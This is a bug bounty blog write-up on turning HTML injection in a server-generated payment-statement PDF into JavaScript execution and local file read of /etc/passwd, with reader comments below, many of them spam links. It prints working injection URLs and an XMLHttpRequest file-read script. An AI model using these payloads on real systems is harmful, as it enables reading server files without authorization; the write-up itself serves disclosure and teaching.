Local File Read via XSS in Dynamically Generated PDF
REDIRECTING TO THE NEW BLOG ...
Hello Hunters,This time I am writing about a Vulnerability found in another private program(xyz.com) on Bugcrowd which at first I thought wasn't much harmful(P4) but later escalated it to a P1.
While browsing the Application I came across an endpoint which allowed us to download some kind of Payment Statements as PDF.
The URL looked like this
https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=xyz&date=2017-08-11&settlement_type=all&advice_id=undefined
I saw that the Value of utr number is reflected inside the PDF file that got downloaded so I wrote some HTML in utrnumber parameter as "><S>aaa
https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber="><S>aaa &date=2017-08-11&settlement_type=all&advice_id=undefined
Upon opening this PDF I found that the HTML was rendered and could be seen in PDF. This kind of vulnerability usually leads to XSS but this time it was inside a PDF which was being generated dynamically.
If you want to learn more about XSS then I advise to checkout this great intro on XSS: https://www.aptive.co.uk/blog/xss-cross-site-scripting/
I tried if I could use an iframe and load internal domains in the frame or if I could iframe file:///etc/passwd but none of the tricks worked! also, I wasn't able to iframe external domains.
https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber="><iframe src="http://localhost"></iframe>&date=2017-08-11&settlement_type=all&advice_id=undefined
But, from now I didn't know if I could go further because I wasn't sure if javascript could be executed like this in PDF.So after playing around a lot I found that we could execute javascript with the help of DOM Manipulation
<p id="test">aa</p><script>document.getElementById('test').innerHTML+='aa'</script>
https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<p id="test">aa</p><script>document.getElementById('test').innerHTML+='aa'</script>&date=2017-08-11&settlement_type=all&advice_id=undefined
also sometime later, I found that I could also use document.write() function to show results more easily.
<img src=x onerror=document.write('aaaa')>
after this I checked the window.location of where this javascript is executed and to my surprise it was executing in file:// origin on the Server
https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<img src=x onerror=document.write('aaaa'%2bwindow.location)>&date=2017-08-11&settlement_type=all&advice_id=undefined
Now since its executing on file://, I tried if we could access file:///etc/passwd via XHR(XMLHttpRequest), I wasn't sure myself.
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>
https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>&date=2017-08-11&settlement_type=all&advice_id=undefined
and then you know ;)
and then you know ;)
so That was it, XSS in Server Side Generated PDFs to Local File Read!
However, it took :P me some time to figure this You could see the number of PDFs I had to download:
Rahul Maini
bhai kaise <3
ReplyDeleteGreat Find!
ReplyDeleteNice shot
ReplyDeleteNice Bro.. :)
ReplyDeleteVery nice Bro :)
ReplyDeleteNicely done!
ReplyDeleteNice, I use this today in an engagement. Awesome finding
ReplyDeleteDoes this lead to probably ssrf too?
DeleteThanks :) Actually yea it leads to a SSRF but since it was executing under file:/// , and I don't may be thats why I wasn't able to load/iframe any of the http:// origin but should work in other cases like you might check this awesome blogpost by @bbuerhaus https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/
Deletehi
Deletei found same case and there is ssrf and server downloads file from my http server. But problem is that i am not able to exploit LFI
need ur help can i contact u
ReplyDeleteGreat find!
ReplyDeleteGreat finding
ReplyDeleteSharp
ReplyDeleteAdvan
Metro
Lampung
Panasonic
pulsa
lampung
Lampung
Lampung
Nice article
ReplyDeleteairtel recharge list
The person merely uploads the picture that they need transformed and the net picture converter renders the picture and makes it accessible for obtain. Like all picture vectorizer applications, they range in high quality, pace, options and price. If you want to learn more about this topic please visit onlineconvertfree.com
ReplyDeletehere from HTB, thanks a lot!
ReplyDeletei need the pdf file
ReplyDeleteThis comment has been removed by the author.
ReplyDeletej.aadithya techusa is #1: vapt services in usa https://www.algotradeusa.com/
ReplyDeleteCross-site scripting attacks, often abbreviated as XSS, are a type of attack in http://casitabuilderlasvegas.com/
ReplyDeleteĐặt vé máy bay tại đại lý Aivivu, tham khảo
ReplyDeleteVe may bay di My
mua vé máy bay từ mỹ về vn
giá vé máy bay đà nẵng đi nha trang
bảng giá vé máy bay đi phú quốc
vé máy bay đi Huế pacific airline
A self-hosted WordPress site gives you the opportunity to earn more and become a successful Internet marketer. Take the first step today by getting a beginner WordPress course. best course to learn R programming
ReplyDelete